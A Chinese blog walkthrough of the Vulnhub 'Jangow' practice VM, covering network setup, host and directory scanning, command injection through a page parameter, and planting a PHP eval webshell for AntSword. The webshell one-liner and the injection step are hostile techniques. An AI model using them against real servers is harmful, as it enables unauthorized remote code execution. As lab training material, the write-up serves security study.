首页 > 其他分享 >Vulnhub靶场(Jangow)

Vulnhub靶场(Jangow)

时间:2024-12-28 08:56:58浏览次数:7  
标签:ip Jangow 网卡 点击 Vulnhub 靶场 靶机 页面

项目地址

Jangow: 1.0.1 ~ VulnHub

1.搭建靶机

一些vm有配置问题,需要修改网卡信息

启动时点击第二个 按回车

继续选择第二个 按e进入编辑

删除"recovery nomodeset"

在末尾添加"quiet splash rw init=/bin/bash"

Ctrl+x 启动进入如下界面

编辑文件sudo vim /etc/network/interfaces (将网卡信息设置为自己的网卡,重启电脑即可生效。)

网络模式改为NAT模式后打开

2.信息收集

kali终端输入 扫描靶机ip

arp-scan -l

扫描后台目录

dirb http://192.168.131.174

3.渗透测试

访问靶机ip

点击size

都尝试点一点

当点击Buscar发现是空白页面

并且发现url有缺失 输入指令试试

上传一句话木马试试

echo '<?php eval($_POST["123"]);' > 1.php

页面显示空白 尝试去蚁剑连接

over

标签:ip,Jangow,网卡,点击,Vulnhub,靶场,靶机,页面
From: https://blog.csdn.net/m0_68706634/article/details/144748613

相关文章

  • lin.security提权靶场渗透
    声明!学习视频来自B站up主**泷羽sec**有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的小伙伴可以点击下面连接进入b站主页[B......
  • vulnhub靶场Empire_LupinOne
    一、部署靶机靶机设置为nat模式开启靶机直接暴露靶机ip二、信息收集扫ip访问靶机地址扫目录dirbhttp://192.168.146.155dirsearch-uhttp://192.168.146.155扫端口nmap-sS-A-T4192.168.146.155//对靶机开放的端口进行更详细的扫描nmap-sC-......
  • oscp备考,oscp系列——FristiLeaks_1.3靶场
    oscp备考,oscp系列——FristiLeaks_1.3靶场FristiLeaks_1.3难度为简单靶场考察信息收集,有点ctf的味道,通过提示最后发现upload上传地点使用Apache解析漏洞,绕过白名单限制最后牛脏提权下载地址:https://pan.quark.cn/s/26e1cb6958fcnmap主机发现└─#nmap-sn192.168.......
  • 靶场奇妙记之Stapler
    公众号:泷羽Sec-Ceo声明!        学习视频来自B站up主**泷羽sec**有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的......
  • Vulnhub-SolidState打靶
    目录一、nmap扫描二、pop3泄露的ssh密码登录ssh,并rbash逃逸三、root权限脚本反弹shell提权四、总结一、nmap扫描nmap-sT--min-rate10000192.168.213.141 -oAnmapscan/port扫描tcp开放了那些端口,保存到nmap/port中nmap-sU --min-rate10000192.168.213.141......
  • 「玩转 Vulnhub:Kioptrix 5 靶机的渗透与解题思路」
    获取靶机地址:点击领取获取更多资料工具:点击领取信息收集主机发现首先我们要找到靶机的ip,先用kali扫一圈同网段存活的ip,再将靶机打开,然后接着再扫一遍sudo arp-scan -l端口扫描下一步是收集有关靶机上运行的服务的信息。sudo nmap -p- -A 192.168.17.129发......
  • Vulnhub 靶场 N00b: 1
    先下载靶机靶机地址:https://www.vulnhub.com/entry/noob-1,746/收集信息1.发现靶机IP首先查看kaili的IP靶机要和kali在同一模式下(NAT)靶机ip arp-scan--interface=eth0--localnet 这里也是找到了IP2.端口扫描 nmap -sS-sV-T4-A-p-192.168.239.9......
  • Vnlhun靶场Log4j2漏洞
    相关概念log4j2是Apache的⼀个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞漏洞原理简单说就是当你使⽤log4j2中提供的⽅法去输出⽇志信息时,⽐如说最常⻅的:Stringa="变量输⼊"JNDI注入介绍JNDI,中⽂名叫j......
  • xml靶场实战
    实战一:http://172.16.0.87获得c:/flag/flag进入网站,随便输入一个账号和密码在burpsuite中拦截请求,并构建xml声明,从而得到结果实战二:把xxe靶场压缩包下载到电脑,ovf文件双击导入虚拟机,即可安装成功,然后扫描网段发现靶机ip,apache默认页面即为靶机地址。获得最终的flag安装虚......
  • 文件解析漏洞靶场实战
    1.IIS6.X安装windows2003和IIS6.X环境,进入inetpub/wwwroot目录下,创建一个.asp后缀的文件创建一个后缀为.jpg的文件,写入一句话,显示当前时间查看IP地址,在浏览器访问.jpg文件2.IIS7.X开启IIS7.X,并修改php.ini里面的配置文件修改windows系统中的IIS服务,并重启PHPstudy......